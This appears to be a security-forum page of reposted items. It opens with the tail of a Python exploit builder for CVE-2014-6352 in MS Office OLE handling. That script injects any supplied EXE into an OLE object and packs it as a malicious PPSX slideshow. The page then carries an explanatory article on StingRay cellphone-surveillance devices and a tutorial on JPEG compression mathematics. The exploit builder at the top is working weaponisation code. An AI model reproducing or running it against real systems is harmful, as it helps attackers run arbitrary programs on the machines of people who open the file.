"\x00\x00\x4A\x03\x00\x00\x4B\x03\x00\x00\x4C\x03\x00\x00\x4D\x03\x00\x00\x4E\x03\x00\x00\x4F\x03\x00\x00\x50\x03\x00\x00\x51\x03\x00\x00" "\x52\x03\x00\x00\x53\x03\x00\x00\x54\x03\x00\x00\x55\x03\x00\x00\x56\x03\x00\x00\x57\x03\x00\x00\x58\x03\x00\x00\x59\x03\x00\x00\x5A\x03" "\x00\x00\x5B\x03\x00\x00\x5C\x03\x00\x00\x5D\x03\x00\x00\x5E\x03\x00\x00\x5F\x03\x00\x00\x60\x03\x00\x00\x61\x03\x00\x00\x62\x03\x00\x00" "\x63\x03\x00\x00\x64\x03\x00\x00\x65\x03\x00\x00\x66\x03\x00\x00\x67\x03\x00\x00\x68\x03\x00\x00\x69\x03\x00\x00\x6A\x03\x00\x00\x6B\x03" "\x00\x00\x6C\x03\x00\x00\x6D\x03\x00\x00\x6E\x03\x00\x00\x6F\x03\x00\x00\x70\x03\x00\x00\x71\x03\x00\x00\x72\x03\x00\x00\x73\x03\x00\x00" "\x74\x03\x00\x00\x75\x03\x00\x00\x76\x03\x00\x00\x77\x03\x00\x00\x78\x03\x00\x00\x79\x03\x00\x00\x7A\x03\x00\x00\x7B\x03\x00\x00\x7C\x03" "\x00\x00\x7D\x03\x00\x00\x7E\x03\x00\x00\x7F\x03\x00\x00\x80\x03\x00\x00\x81\x03\x00\x00\x82\x03\x00\x00\x83\x03\x00\x00\x84\x03\x00\x00" "\x85\x03\x00\x00\x86\x03\x00\x00\x87\x03\x00\x00\x88\x03\x00\x00\x89\x03\x00\x00\x8A\x03\x00\x00\x8B\x03\x00\x00\x8C\x03\x00\x00\x8D\x03" "\x00\x00\x8E\x03\x00\x00\x8F\x03\x00\x00\x90\x03\x00\x00\x91\x03\x00\x00\x92\x03\x00\x00\x93\x03\x00\x00\x94\x03\x00\x00\x95\x03\x00\x00" "\x96\x03\x00\x00\x97\x03\x00\x00\x98\x03\x00\x00\x99\x03\x00\x00\x9A\x03\x00\x00\x9B\x03\x00\x00\x9C\x03\x00\x00\x9D\x03\x00\x00\x9E\x03" "\x00\x00\x9F\x03\x00\x00\xA0\x03\x00\x00\xA1\x03\x00\x00\xA2\x03\x00\x00\xA3\x03\x00\x00\xA4\x03\x00\x00\xA5\x03\x00\x00\xA6\x03\x00\x00" "\xA7\x03\x00\x00\xA8\x03\x00\x00\xA9\x03\x00\x00\xAA\x03\x00\x00\xAB\x03\x00\x00\xAC\x03\x00\x00\xAD\x03\x00\x00\xAE\x03\x00\x00\xAF\x03" "\x00\x00\xB0\x03\x00\x00\xB1\x03\x00\x00\xB2\x03\x00\x00\xB3\x03\x00\x00\xB4\x03\x00\x00\xB5\x03\x00\x00\xB6\x03\x00\x00\xB7\x03\x00\x00" "\xB8\x03\x00\x00\xB9\x03\x00\x00\xBA\x03\x00\x00\xBB\x03\x00\x00\xBC\x03\x00\x00\xBD\x03\x00\x00\xBE\x03\x00\x00\xBF\x03\x00\x00\xC0\x03" "\x00\x00\xC1\x03\x00\x00\xC2\x03\x00\x00\xC3\x03\x00\x00\xC4\x03\x00\x00\xC5\x03\x00\x00\xC6\x03\x00\x00\xC7\x03\x00\x00\xC8\x03\x00\x00" 
"\xC9\x03\x00\x00\xCA\x03\x00\x00\xCB\x03\x00\x00\xCC\x03\x00\x00\xCD\x03\x00\x00\xCE\x03\x00\x00\xCF\x03\x00\x00\xD0\x03\x00\x00\xD1\x03" "\x00\x00\xFE\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF" "\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF" "\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF" "\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF" "\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF" "\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\x19\x91\x07\x00\x02\x00\x70\x75\x74\x74\x79\x2E\x65\x78" "\x65\x00\x43\x3A\x5C\x55\x73\x65\x72\x73\x5C\x48\x43\x4C\x5C\x44\x65\x73\x6B\x74\x6F\x70\x5C\x50\x4F\x43\x5C\x70\x75\x74\x74\x79\x2E\x65" "\x78\x65\x00\x00\x00\x03\x00\x2A\x00\x00\x00\x43\x3A\x5C\x55\x73\x65\x72\x73\x5C\x48\x43\x4C\x5C\x41\x70\x70\x44\x61\x74\x61\x5C\x4C\x6F" "\x63\x61\x6C\x5C\x54\x65\x6D\x70\x5C\x70\x75\x74\x74\x79\x2E\x65\x78\x65\x00\x00\x90\x07\x00" ) if len(sys.argv) != 2: print ("[+] Usage: "+ sys.argv[0] + " [exe file] (EXE file should be less than 400KB)") exit(0) file = sys.argv[1] f = open(file,mode='rb') buff=f.read() f.close() evilbuff = bytearray((oleole + buff)) evilbuff += "\x00" * 20000 file = "temp\ppt\embeddings\oleObject1.bin" f = open(file,mode='wb') f.write(evilbuff) print ("[+] Injected exe into OLE") shutil.make_archive("exploit", "zip", "temp") print ("[+] packing exploit ppsx") shutil.move('exploit.zip', 'CVE-2014-6352.ppsx') print ("[+] Done") Sursa: MS Office 2007 and 2010 - OLE Arbitrary Command Execution
  2. StingRay Technology: How Government Tracks Cellular Devices

StingRay Technology

StingRay is an IMSI-catcher (International Mobile Subscriber Identity) designed and commercialized by the Harris Corporation. The cellular-surveillance system costs as much as $400,000 in the basic configuration, and its price varies with the add-ons ordered by the agency.

The IMSI-catcher is a surveillance solution used by military and intelligence agencies for telephone eavesdropping. It allows for intercepting mobile phone traffic and tracking the movements of mobile phone users. Essentially, an IMSI-catcher operates as a bogus mobile cell tower that sits between the target mobile phone and the service provider's real towers. The IMSI-catcher runs a man-in-the-middle (MITM) attack that cannot be detected by users without specific products that secure communication on mobile devices.

The use of the IMSI-catcher is raising a heated debate in the United States because devices like StingRay and other similar cellphone-tracking solutions are being widely adopted by law enforcement agencies across the country. Due to the popularity of StingRay, the name is often used improperly to refer to several types of cellphone-surveillance solutions.

StingRay allows law enforcement to intercept calls and Internet traffic, send fake texts, inject malware onto a mobile device, and locate targets. Privacy advocates are concerned about possible abuses of such invasive technology. They speculate that there is a concrete risk that cyber criminals and foreign state-sponsored hackers could use it to track US citizens.

StingRay-like solutions, also known as cell site simulators, trick cellphones into revealing different data, including users' locations and identifying information. Law enforcement and intelligence agencies can target a specific individual by analyzing incoming and outgoing calls and mapping his social network. The principal problem in the adoption of StingRay cellphone-surveillance technology is that, unlike other solutions, it targets all nearby cellular devices, allowing its operator to gather information from hundreds of devices concurrently.

Figure 1 – StingRay

As explained by Nathan Freed Wessler, an attorney with the ACLU's Speech, Privacy & Technology Project, StingRay equipment sends intrusive electronic signals into the immediate vicinity, penetrating private buildings and siphoning data about the locations and identities of the cellphones inside. The Federal Communications Commission (FCC) recently created an internal task force to study the misuse of IMSI-catchers by the cybercrime ecosystem and foreign intelligence agencies, after demonstrations that this technology could be used to spy on American citizens, businesses, and diplomats.

How does StingRay work?

StingRay equipment can operate in both active and passive modes. In active mode, the device simulates the behavior of a wireless carrier cell tower and interacts directly with nearby cellular devices, performing operations like data extraction. In passive mode, it simply receives and analyzes the signals transmitted by cellular devices and carrier cell sites. The StingRay system is typically installed in a vehicle so that agents can move it into any neighborhood. It tricks all nearby cellular devices into connecting to it, allowing data access by law enforcement. Let us see the two operating modes implemented by the StingRay technology in detail.

The Passive mode

A StingRay operating in passive mode is able to receive and analyze signals being transmitted by mobile devices and wireless carrier cell stations.
The term “passive” indicates that the equipment doesn't communicate directly with cellular devices and does not simulate a wireless carrier cell site. The activity of base station surveys allows extracting information on cell sites, including identification numbers, signal strength, and signal coverage areas. In passive mode, StingRay operates like a mobile phone, collecting the signals sent by cell stations near the equipment.

The Active mode

StingRay equipment operating in “active mode” forces each cellular device in a predetermined area to disconnect from its legitimate service provider's cell site and establish a new connection with the attacker's StingRay system. StingRay broadcasts a pilot signal that is stronger than the signals sent by legitimate cell sites operating in the same area, forcing connections from the cellular devices in the area covered by the equipment. The principal operations performed by the StingRay are:

- Extracting data from cellular devices – StingRay collects information that identifies a cellular device (e.g., IMSI, ESN) directly from it by using radio waves
- Running man-in-the-middle attacks to eavesdrop on communications content
- Writing metadata to the cellular device
- Denial of service, preventing the cellular device's user from placing a call or accessing data services
- Forcing an increase in signal transmission power
- Forcing an abundance of signal transmissions
- Tracking and locating

Figure 2 – StingRay case study

USA – StingRay is a prerogative of intelligence agencies

Surveillance of cell phones is a common practice in intelligence agencies. Agents have used devices like StingRay for a long time, and their use has extended to local law enforcement in the USA. Dozens of local law enforcement and police agencies are collecting information about thousands of cell phones at a time by using advanced technology, according to public records obtained by various media agencies in the country.

USA Today reported that records from more than 125 police agencies in 33 states reveal that nearly 25 percent of law-enforcement agencies have used "tower dumps," and at least 25 police departments have purchased StingRay equipment. Many police agencies have denied public records requests, arguing that criminals or terrorists could benefit from the disclosure of information and avoid the surveillance methods adopted locally by law enforcement.

Security experts and privacy advocates have raised questions regarding the use of StingRay technology and the way law enforcement agencies manage and share citizens' data. The militarization of America's local police agencies is a phenomenon attracting the attention of the media as never before, probably also as a consequence of the debate on privacy and surveillance triggered by Snowden's revelations.

The phenomenon is not limited to the US. Recent documents released by the City of Oakland reveal that the local Police Department, the nearby Fremont Police Department, and the Alameda County District Attorney jointly requested an upgrade for their cellular surveillance equipment. The specific upgrade to StingRay is known as Hailstorm, and it is necessary to allow the equipment to track cellular devices of the newest generation. According to the Ars web portal, the upgrade will cost $460,000, including $205,000 in total Homeland Security grant money and $50,000 from the Oakland Police Department. Cellular tracking technology like StingRay is still considered a privileged solution to track cellular devices and siphon their data.
The interest of local law enforcement in surveillance solutions is increasing, and the decision to upgrade existing equipment leads privacy experts to believe that its diffusion will continue to grow.

A look at the technologies that track cellular devices

To better understand the StingRay technology, let us familiarize ourselves with the names of the principal surveillance solutions available on the market.

Triggerfish

Triggerfish is eavesdropping equipment that allows law enforcement to intercept cellular conversations in real time. Its use extends the basic capabilities of StingRay, which are more oriented to device location monitoring and gathering metadata. Triggerfish allows authorities to monitor up to 60,000 different phones at one time over the targeted area.

Figure 3 – Triggerfish

According to a post published by the journalist Ryan Gallagher on Ars, its cost ranges between $90,000 and $102,000.

Kingfish

Kingfish is a surveillance transceiver that is used by law enforcement and intelligence agencies to track cellular devices and exfiltrate information from mobile devices over a targeted area. It can be concealed in a briefcase, allows gathering unique identity codes, and shows connections between phones and the numbers being dialed. Its cost is slightly higher than $25,000.

Figure 4 – Kingfish

Amberjack

Amberjack is an important accessory for surveillance systems like StingRay, Gossamer, and Kingfish. It is a direction-finding antenna system that is used for cellular device tracking. It costs about $35,015.

Harpoon

Harpoon is an "amplifier" (PDF) that can work in conjunction with both StingRay and Kingfish devices to track targets from a greater distance. Its cost ranges between $16,000 and $19,000.

Figure 5 – Harpoon

Hailstorm

Hailstorm is a surveillance device that can be purchased as a standalone unit or as an upgrade to StingRay or Kingfish. The system allows the tracking of cellular devices even if they are based on modern technology.

"Procurement documents (PDF) show that Harris Corp. has, in at least one case, recommended that authorities use the Hailstorm in conjunction with software made by Nebraska-based surveillance company Pen-Link. The Pen-Link software appears to enable authorities deploying the Hailstorm to directly communicate with cell phone carriers over an Internet connection, possibly to help coordinate the surveillance of targeted individuals," states an Ars blog post.

The cost of Hailstorm is $169,602 if it is sold as a standalone unit; it can be cheaper if acquired as an upgrade.

Gossamer

Gossamer is a portable unit that is used to access data on cellular devices operating in a target area. Gossamer provides functionality similar to StingRay's, with the advantage of being a hand-held model. Gossamer also lets law enforcement run a DoS attack on a target, blocking it from making or receiving calls, as explained in the marketing materials (PDF) published by a Brazilian reseller of the Harris equipment. Gossamer is sold for $19,696.

Figure 6 – The Gossamer

The Case: Metropolitan Police Department (MPD) uses StingRay

StingRay has been used by the police for a long time. In 2003, the Metropolitan Police Department (MPD) in Washington, DC was awarded a $260,000 grant from the Department of Homeland Security (DHS) to acquire StingRay. The purchase was officially motivated by the need to increase capabilities in the investigation of possible terrorist events.
Unfortunately, the device was not used by law enforcement for five years due to the lack of funds to pay for training in its use. In 2008, the Metropolitan Police Department decided to again adopt StingRay for its investigations, and it received funds to upgrade the equipment. VICE News has documented numerous purchases made by the DC police department related to solutions and services offered by the Harris Corporation.

The problem is that, according to government officials, the system wasn't used to prevent terrorist acts; law enforcement is using it in routine investigations involving ordinary crime. There is no documentation regarding the use of StingRay made by the agents of the department.

A memo dated December 2008, sent to the DC chief of police and other top department officials by the commander of the Narcotics and Special Investigations Division, explained how the department intended to use StingRay.

"The [redacted] will be used by MPD to track cellular phones possessed by criminal offenders and/or suspected terrorists by using wireless technology to triangulate the location of the phone," and "the ability to [redacted] in the possession of criminals will allow MPD to track their exact movements, as well as pinpoint their current locations for rapid apprehension," states the document. "The procurement of this equipment will increase the number of MPD arrests for fugitives, drug traffickers, and violent offenders (robbery, assault with a deadly weapon, homicide), while reducing the time it takes to locate dangerous offenders that need to be removed from the streets of DC."

The memo confirms that the department has used StingRay for many purposes other than counter-terrorism activities. Many organizations are condemning the use of such technology because it represents a serious threat to the privacy of citizens. When an agency uses StingRay to track a specific individual, it is very likely that the system will also catch many other devices belonging to innocent and unaware people.

"When it's used to track a suspect's cell phone, [it] also gathers information about the phones of countless bystanders who happen to be nearby," explain representatives of the American Civil Liberties Union (ACLU).

StingRay is also a privileged instrument for collecting information about ongoing communications, including the phone numbers of interlocutors. It is important to understand that its use opens the door to a sort of invasive surveillance. The principal problem related to the use of StingRays and similar solutions is their application context. This category of equipment, in fact, was mainly designed to support intelligence activities, but today its use has been extended to local law enforcement, as explained by Nathan Wessler: "Initially the domain of the National Security Agency (NSA) and other intelligence agencies," the use of the tracking device has now "trickled down to federal, state, and local law enforcement."

The extensive use of StingRay is a violation of the Fourth Amendment; it is threatening the rights of tens of thousands of DC residents.
The ACLU has identified 44 law enforcement agencies in 18 US states that use StingRay equipment in their investigations, but, as explained by Wessler, the use of such devices in the vicinity of government offices is a circumstance of great concern. That is why he mentioned the case of the capital, Washington.

"An inherent attribute of how this technology functions is that it sweeps in information about large numbers of innocent bystanders even when police are trying to track the location of a particular suspect. If the MPD is driving around DC with Stingray devices, it is likely capturing information about the locations and movements of members of Congress, cabinet members, federal law enforcement agents, and Homeland Security personnel, consular staff, and foreign dignitaries, and all of the other people who congregate in the District.... If cell phone calls of congressional staff, White House aides, or even members of Congress are being disconnected, dropped, or blocked by MPD Stingrays, that's a particularly sensitive and troublesome problem," said Wessler during an interview with VICE News.

Documents obtained from the FBI by the website MuckRock revealed that law enforcement agencies are required to sign a non-disclosure agreement with the Bureau before they can start using StingRays in their investigations. The ACLU obtained emails explaining that the vendor, Harris Corporation, misled the FCC into approving StingRay by presenting its adoption as intended for "emergency situations." In reality, the equipment is used by law enforcement for any kind of investigation.

The following map reports the use of the StingRay tracking system by state and local police departments. According to the ACLU, 46 agencies in 18 states and the District of Columbia own StingRays. According to privacy experts, this data underestimates the real diffusion of the StingRay system because of the lack of official documentation reporting the number of investigations in which the equipment has been used.

Figure 7 – StingRay diffusion in the USA

Conclusion

StingRay technology raises serious privacy concerns because of the indiscriminate way it targets cellular devices in a specific area. The dragnet way in which StingRay operates appears to be in contrast with the principles of various laws worldwide. Government and law enforcement shouldn't be able to access citizens' private information without a court order issued to support investigative activities. In the US, for example, the Fourth Amendment stands for the basic principle that the US government cannot conduct massive surveillance operations, also referred to as "general searches". The Supreme Court recently reiterated that principle in a case involving cell phone surveillance, confirming that law enforcement needs a warrant to analyze data on a suspect's cellphone.

Organizations for the defense of civil liberties ask governments to require warrants for the use of surveillance technologies like StingRay. The warrant still represents a reasonable mechanism for ensuring the right balance between citizens' privacy and law enforcement needs. Organizations such as the American Civil Liberties Union and the Electronic Privacy Information Center (EPIC) have highlighted the risks related to the indiscriminate collection of such a large amount of cellular data. "I don't think that these devices should never be used, but at the same time, you should clearly be getting a warrant," said Alan Butler of EPIC.
Unfortunately, cases such as the one disclosed in this post suggest that governments are using StingRay equipment in secrecy. In some cases, a court order is issued for specific activities, but law enforcement arbitrarily extends the use of the technology to other contexts that may threaten citizens' privacy.

References

- https://news.vice.com/article/police-in-washington-dc-are-using-the-secretive-stingray-cell-phone-tracking-tool
- Surveillance - How to secretly track cellphone users position | Security Affairs
- https://www.aclu.org/blog/national-security-technology-and-liberty/trickle-down-surveillance
- https://www.aclu.org/maps/stingray-tracking-devices-whos-got-them
- Cellphone spying gear, law enforcement has it, and it wants you to forget about it
- https://www.scribd.com/doc/238334715/Stingray-Phone-Tracker
- LYE: Short-circuiting 'stingray' surveillance of cellphones - Washington Times
- Cellphone data spying: It's not just the NSA
- https://www.aclu.org/files/assets/rigmaiden_-_doj_stingray_emails_declaration.pdf
- Meet the machines that steal your phone's data | Ars Technica
- http://cdn.arstechnica.net/wp-content/uploads/2013/09/amberjack.pdf
- Request 2595
- http://cdn.arstechnica.net/wp-content/uploads/2013/09/oakland-penlink-hailstorm.pdf

By Pierluigi Paganini | November 10th, 2014 | General Security

Source: StingRay Technology: How Government Tracks Cellular Devices - InfoSec Institute
  3. Image Compression: Seeing What's Not There

In this article, we'll study the JPEG baseline compression algorithm...

David Austin
Grand Valley State University
david at merganser.math.gvsu.edu

The HTML file that contains all the text for this article is about 25,000 bytes. That's less than one of the image files that was also downloaded when you selected this page. Since image files typically are larger than text files, and since web pages often contain many images that are transmitted across connections that can be slow, it's helpful to have a way to represent images in a compact format. In this article, we'll see how a JPEG file represents an image using a fraction of the computer storage that might be expected. We'll also look at some of the mathematics behind the newer JPEG 2000 standard.

This topic, more widely known as data compression, asks the question, "How can we represent information in a compact, efficient way?" Besides image files, it is routine to compress data, video, and music files. For instance, compression enables your 8 gigabyte iPod Nano to hold about 2000 songs. As we'll see, the key is to organize the information in some way that reveals an inherent redundancy that can be eliminated.

In this article, we'll study the JPEG baseline compression algorithm using the image on the right as an example. (JPEG is an acronym for "Joint Photographic Experts Group.") Some compression algorithms are lossless, for they preserve all the original information. Others, such as the JPEG baseline algorithm, are lossy--some of the information is lost, but only information that is judged to be insignificant.

Before we begin, let's naively determine how much computer storage should be required for this image. First, the image is arranged in a rectangular grid of pixels whose dimensions are 250 by 375, giving a total of 93,750 pixels. The color of each pixel is determined by specifying how much of the colors red, green, and blue should be mixed together. Each color component is represented as an integer between 0 and 255 and so requires one byte of computer storage. Therefore, each pixel requires three bytes of storage, implying that the entire image should require 93,750 × 3 = 281,250 bytes. However, the JPEG image shown here is only 32,414 bytes. In other words, the image has been compressed by a factor of roughly nine. We will describe how the image can be represented in such a small file (compressed) and how it may be reconstructed (decompressed) from this file.

The JPEG compression algorithm

First, the image is divided into 8 by 8 blocks of pixels. Since each block is processed without reference to the others, we'll concentrate on a single block. In particular, we'll focus on the block highlighted below. Here is the same block blown up so that the individual pixels are more apparent. Notice that there is not tremendous variation over the 8 by 8 block (though other blocks may have more).

Remember that the goal of data compression is to represent the data in a way that reveals some redundancy. We may think of the color of each pixel as represented by a three-dimensional vector (R, G, B) consisting of its red, green, and blue components. In a typical image, there is a significant amount of correlation between these components. For this reason, we will use a color space transform to produce a new vector whose components represent luminance, Y, and blue and red chrominance, Cb and Cr. The luminance describes the brightness of the pixel, while the chrominance carries information about its hue. These three quantities are typically less correlated than the (R, G, B) components. Furthermore, psychovisual experiments demonstrate that the human eye is more sensitive to luminance than chrominance, which means that we may neglect larger changes in the chrominance without affecting our perception of the image. Since this transformation is invertible, we will be able to recover the (R, G, B) vector from the (Y, Cb, Cr) vector, which is important when we wish to reconstruct the image. (To be precise, we usually add 128 to the chrominance components so that they are represented as numbers between 0 and 255.)
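To make this concrete, here is a minimal Python sketch of such a color space transform. (The article doesn't print its conversion matrix, so the constants below are the common JFIF ones and should be read as an illustration.)

def rgb_to_ycbcr(r, g, b):
    # Luminance Y plus blue and red chrominance; 128 is added so that
    # Cb and Cr are represented as numbers between 0 and 255.
    y  =  0.299 * r + 0.587 * g + 0.114 * b
    cb = -0.168736 * r - 0.331264 * g + 0.5 * b + 128
    cr =  0.5 * r - 0.418688 * g - 0.081312 * b + 128
    return y, cb, cr

def ycbcr_to_rgb(y, cb, cr):
    # The inverse transform, used when reconstructing the image.
    r = y + 1.402 * (cr - 128)
    g = y - 0.344136 * (cb - 128) - 0.714136 * (cr - 128)
    b = y + 1.772 * (cb - 128)
    return r, g, b

Round-tripping a pixel, e.g. ycbcr_to_rgb(*rgb_to_ycbcr(200, 120, 50)), returns the original components up to floating-point error.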
When we apply this transformation to each pixel in our block, we obtain three new blocks, one corresponding to each component. These are shown below, where brighter pixels correspond to larger values.

(Figure: the Y, Cb, and Cr components of the block.)

As is typical, the luminance shows more variation than the chrominance. For this reason, greater compression ratios are sometimes achieved by assuming the chrominance values are constant on 2 by 2 blocks, thereby recording fewer of these values. For instance, the image editing software Gimp provides the following menu when saving an image as a JPEG file:

(Figure: Gimp's JPEG save dialog.)

The "Subsampling" option allows the choice of various ways of subsampling the chrominance values. Also of note here is the "Quality" parameter, whose importance will become clear soon.

The Discrete Cosine Transform

Now we come to the heart of the compression algorithm. Our expectation is that, over an 8 by 8 block, the changes in the components of the (Y, Cb, Cr) vector are rather mild, as demonstrated by the example above. Instead of recording the individual values of the components, we could record, say, the average values and how much each pixel differs from this average value. In many cases, we would expect the differences from the average to be rather small and hence safely ignored. This is the essence of the Discrete Cosine Transform (DCT), which will now be explained.

We will first focus on one of the three components in one row in our block and imagine that the eight values are represented by f0, f1, ..., f7. We would like to represent these values in a way that makes the variations more apparent. For this reason, we will think of the values as given by a function fx, where x runs from 0 to 7, and write this function as a linear combination of cosine functions:

fx = (1/2) Σw=0..7 Cw Fw cos((2x+1)wπ/16)

Don't worry about the factor of 1/2 in front or the constants Cw (Cw = 1 for all w except C0 = 1/√2). What is important in this expression is that the function fx is being represented as a linear combination of cosine functions of varying frequencies with coefficients Fw.

(Figure: graphs of the cosine functions with frequencies w = 0, 1, 2, 3.)

Of course, the cosine functions with higher frequencies demonstrate more rapid variations. Therefore, if the values fx change relatively slowly, the coefficients Fw for larger frequencies should be relatively small. We could therefore choose not to record those coefficients in an effort to reduce the file size of our image.

The DCT coefficients may be found using

Fw = (Cw/2) Σx=0..7 fx cos((2x+1)wπ/16)

Notice that this implies that the DCT is invertible. For instance, we will begin with fx and record the values Fw. When we wish to reconstruct the image, however, we will have the coefficients Fw and recompute the fx.
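The two formulas translate directly into Python (a plain sketch for illustration; production encoders use a fast DCT, as noted below):

import math

C = [1 / math.sqrt(2)] + [1.0] * 7   # C0 = 1/sqrt(2), Cw = 1 otherwise

def dct_1d(f):
    # Fw = (Cw/2) * sum over x of fx * cos((2x+1) w pi / 16)
    return [C[w] / 2 * sum(f[x] * math.cos((2 * x + 1) * w * math.pi / 16)
                           for x in range(8))
            for w in range(8)]

def idct_1d(F):
    # fx = (1/2) * sum over w of Cw * Fw * cos((2x+1) w pi / 16)
    return [sum(C[w] * F[w] * math.cos((2 * x + 1) * w * math.pi / 16)
                for w in range(8)) / 2
            for x in range(8)]

Here idct_1d(dct_1d(f)) recovers the original eight values up to floating-point error, which is exactly the invertibility used during decompression.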
Rather than applying the DCT to only the rows of our blocks, we will exploit the two-dimensional nature of our image. The Discrete Cosine Transform is first applied to the rows of our block. If the image does not change too rapidly in the vertical direction, then the coefficients shouldn't either. For this reason, we may fix a value of w and apply the Discrete Cosine Transform to the collection of eight values of Fw we get from the eight rows. This results in coefficients Fw,u, where w is the horizontal frequency and u represents a vertical frequency. We store these coefficients in another 8 by 8 block.

(Figure: the block of DCT coefficients Fw,u.)

Notice that when we move down or to the right, we encounter coefficients corresponding to higher frequencies, which we expect to be less significant. The DCT coefficients may be efficiently computed through a Fast Discrete Cosine Transform, in the same spirit that the Fast Fourier Transform efficiently computes the Discrete Fourier Transform.

Quantization

Of course, the coefficients Fw,u are real numbers, which will be stored as integers. This means that we will need to round the coefficients; as we'll see, we do this in a way that facilitates greater compression. Rather than simply rounding the coefficients Fw,u, we will first divide by a quantizing factor and then record

round(Fw,u / Qw,u)

This allows us to emphasize certain frequencies over others. More specifically, the human eye is not particularly sensitive to rapid variations in the image. This means we may deemphasize the higher frequencies, without significantly affecting the visual quality of the image, by choosing a larger quantizing factor for higher frequencies.

Remember also that, when a JPEG file is created, the algorithm asks for a parameter to control the quality of the image and how much the image is compressed. This parameter, which we'll call q, is an integer from 1 to 100. You should think of q as being a measure of the quality of the image: higher values of q correspond to higher quality images and larger file sizes. From q, a quantity α is created using

α = 50/q        if 1 ≤ q ≤ 50
α = 2 − q/50    if 50 < q ≤ 100

Notice that higher values of q give lower values of α. We then round the weights as

round(Fw,u / (α Qw,u))

Naturally, information will be lost through this rounding process. When either α or Qw,u is increased (remember that large values of α correspond to smaller values of the quality parameter q), more information is lost, and the file size decreases.

Here are typical values for Qw,u recommended by the JPEG standard. First, for the luminance coefficients:

16 11 10 16  24  40  51  61
12 12 14 19  26  58  60  55
14 13 16 24  40  57  69  56
14 17 22 29  51  87  80  62
18 22 37 56  68 109 103  77
24 35 55 64  81 104 113  92
49 64 78 87 103 121 120 101
72 92 95 98 112 100 103  99

and for the chrominance coefficients:

17 18 24 47 99 99 99 99
18 21 26 66 99 99 99 99
24 26 56 99 99 99 99 99
47 66 99 99 99 99 99 99
99 99 99 99 99 99 99 99
99 99 99 99 99 99 99 99
99 99 99 99 99 99 99 99
99 99 99 99 99 99 99 99

These values are chosen to emphasize the lower frequencies. Let's see how this works in our example. Remember that we have the following blocks of values:

(Figure: the Y, Cb, and Cr coefficient blocks.)

Quantizing with q = 50 gives the following blocks:

(Figure: the quantized Y, Cb, and Cr blocks.)

The entry in the upper left corner essentially represents the average over the block.
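In the running sketch, the quantization step and its approximate inverse look like this (assuming the formula for α above; F is an 8 by 8 block of DCT coefficients and Q one of the two tables):

def alpha(q):
    # Larger alpha (lower quality q) means coarser quantization.
    return 50.0 / q if q <= 50 else 2 - q / 50.0

def quantize(F, Q, q=50):
    a = alpha(q)
    return [[int(round(F[u][w] / (a * Q[u][w]))) for w in range(8)]
            for u in range(8)]

def dequantize(Fq, Q, q=50):
    # Only approximate coefficients come back: the rounding above is lossy.
    a = alpha(q)
    return [[Fq[u][w] * a * Q[u][w] for w in range(8)] for u in range(8)]

With q = 50 we get α = 1, so the tables are used as-is; the larger entries toward the lower right drive most of the high-frequency coefficients to zero.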
Moving to the right increases the horizontal frequency, while moving down increases the vertical frequency. What is important here is that there are lots of zeroes. We now order the coefficients as shown below so that the lower frequencies appear first.

(Figure: the zigzag ordering of the 8 by 8 coefficient block.)

In particular, for the luminance coefficients we record

20 -7 1 -1 0 -1 1 0 0 0 0 0 0 0 -2 1 1 0 0 0 0 ... 0

Instead of recording all the zeroes, we can simply say how many appear (notice that there are even more zeroes in the chrominance weights). In this way, the sequences of DCT coefficients are greatly shortened, which is the goal of the compression algorithm. In fact, the JPEG algorithm uses extremely efficient means to encode sequences like this.
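This reordering and the shortening of the zero run can be sketched as follows (the actual standard encodes the result even more compactly, with run-length and Huffman coding):

def zigzag_indices():
    # Walk the 8x8 grid by anti-diagonals, lowest frequencies first,
    # alternating direction from one diagonal to the next.
    return sorted(((u, w) for u in range(8) for w in range(8)),
                  key=lambda p: (p[0] + p[1],
                                 p[0] if (p[0] + p[1]) % 2 else p[1]))

def to_sequence(block):
    zz = [block[u][w] for (u, w) in zigzag_indices()]
    n = len(zz)
    while n > 0 and zz[n - 1] == 0:   # strip the trailing zeros...
        n -= 1
    return zz[:n], 64 - n             # ...and just record how many there were

Applied to the quantized luminance block, to_sequence returns the short prefix shown above together with the count of trailing zeros.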
When we reconstruct the DCT coefficients, we find

(Figure: the original and reconstructed Y, Cb, and Cr blocks.)

Reconstructing the image from this information is rather straightforward. The quantization matrices are stored in the file so that approximate values of the DCT coefficients may be recomputed. From here, the (Y, Cb, Cr) vector is found through the Inverse Discrete Cosine Transform. Then the (R, G, B) vector is recovered by inverting the color space transform. Here is the reconstruction of the 8 by 8 block with the parameter q set to 50

(Figure: original block vs. reconstruction with q = 50.)

and, below, with the quality parameter q set to 10. As expected, the higher value of the parameter q gives a higher quality image.

(Figure: original block vs. reconstruction with q = 10.)

JPEG 2000

While the JPEG compression algorithm has been quite successful, several factors created the need for a new algorithm, two of which we will now describe.

First, the JPEG algorithm's use of the DCT leads to discontinuities at the boundaries of the 8 by 8 blocks. For instance, the color of a pixel on the edge of a block can be influenced by that of a pixel anywhere in the block, but not by an adjacent pixel in another block. This leads to blocking artifacts, demonstrated by the version of our image created with the quality parameter q set to 5 (by the way, the size of this image file is only 1702 bytes), and it explains why JPEG is not an ideal format for storing line art.

